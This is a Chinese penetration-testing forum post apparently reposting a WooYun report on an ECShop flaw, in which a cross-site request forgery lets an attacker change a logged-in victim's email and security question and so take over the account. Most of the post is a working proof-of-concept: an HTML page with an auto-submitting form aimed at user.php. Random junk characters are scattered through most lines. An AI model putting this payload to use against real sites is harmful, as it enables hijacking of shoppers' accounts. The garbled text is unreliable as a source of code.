中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:' f: _- ^) h+ ~( b% J7 \) n1 ]" N* U
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现1 F" t& f2 ^/ K
+ m+ F4 b* ~8 p6 o% r  R/ [
Demo For:http://www.wooyun.org/bug.php?action=view&id=395+ _3 S1 L5 y+ V, A# D
9 O5 O8 |, m2 M( u' A0 N& U9 q
详细说明:
9 _; }7 G3 l  B, b1 ]3 i. o. w9 m8 I利用csrf和xss可以突破官方所说的“障碍”
$ m: @! @/ i3 Z! G2 `6 Yxss版本已经有人说明' h$ J; J# u, R
这里给出csrf版本
0 p2 O! U- V$ T, J. K8 e) _2 v/ {$ d( @9 H& F) w- _9 J7 u0 U% T; W( q
漏洞证明:
9 `" C3 g# L6 b/ E0 f, D: `6 a<html>
, w5 ]( V1 ^2 m; q2 c3 B<body>
  {6 V  E" B1 a6 `<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
9 z) K. w5 ^, E% B% V0 H9 Q<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
2 g3 A0 ^% K3 w<INPUT TYPE="text" NAME="act" value="act_edit_profile">6 p6 |; u6 N4 l5 h, T+ X
<INPUT TYPE="text" NAME="sel_question" value="ecshop">% s0 i7 B6 a- r
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">' c/ C( B0 Z2 W. T0 Z5 ?/ ~
</body>3 Z( F' F- ]) e/ @2 a8 D, A
<script>; e: d( |+ I3 U' |; ]( d
document.forms[0].submit();" L$ [1 m% [$ \5 w
</script>
7 B& r0 b1 Z$ c# G</html>
, J6 ^& k! R  j/ {2 M5 o+ [, }3 D构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
) ^4 \/ h0 ~6 ?# }( B
/ I6 _5 k/ g* p8 c, d- r% i




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2